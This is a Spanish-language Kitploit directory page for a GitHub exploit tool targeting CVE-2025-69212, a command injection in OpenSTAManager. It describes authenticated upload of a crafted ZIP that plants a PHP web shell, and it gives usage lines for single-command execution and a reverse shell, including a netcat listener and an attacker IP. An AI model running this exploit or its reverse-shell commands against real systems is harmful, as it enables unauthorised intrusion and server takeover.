Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/pasindu-sd/cve-2025-69212-exploit
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubpasindu-sd/cve-2025-69212-exploit

CVE-2025-69212-Exploit

Exploit automatizado para la inyección de comandos CVE-2025-69212 en OpenSTAManager, con autenticación de administrador, carga de ZIP malicioso y shell inversa o ejecución de comandos.

Ver Repositorio
hace 4 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-69212 - Exploit de inyección de comandos en OpenSTAManager P7M

Un script de exploit totalmente automatizado para CVE-2025-69212, una vulnerabilidad de inyección de comandos en OpenSTAManager. Este script se autentica con credenciales de administrador, implementa un shell web PHP malicioso mediante un archivo P7M manipulado en un archivo ZIP, y proporciona ejecución de comandos o una shell inversa.

Características

  • Autenticación automatizada.
  • Generación y carga de un ZIP malicioso (inyección de invoice.p7m).
  • Envoltura de comandos en Base64 para evitar problemas con caracteres especiales.
  • Argumentos para shell inversa y ejecución de un solo comando.

Uso

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>

Ejemplos

Ejecutar un solo comando:

root@kitploit:~
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'

Obtener una shell inversa:

root@kitploit:~
# Start your netcat listener in another terminal:
nc -lvnp 4444

# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444
Descargar herramienta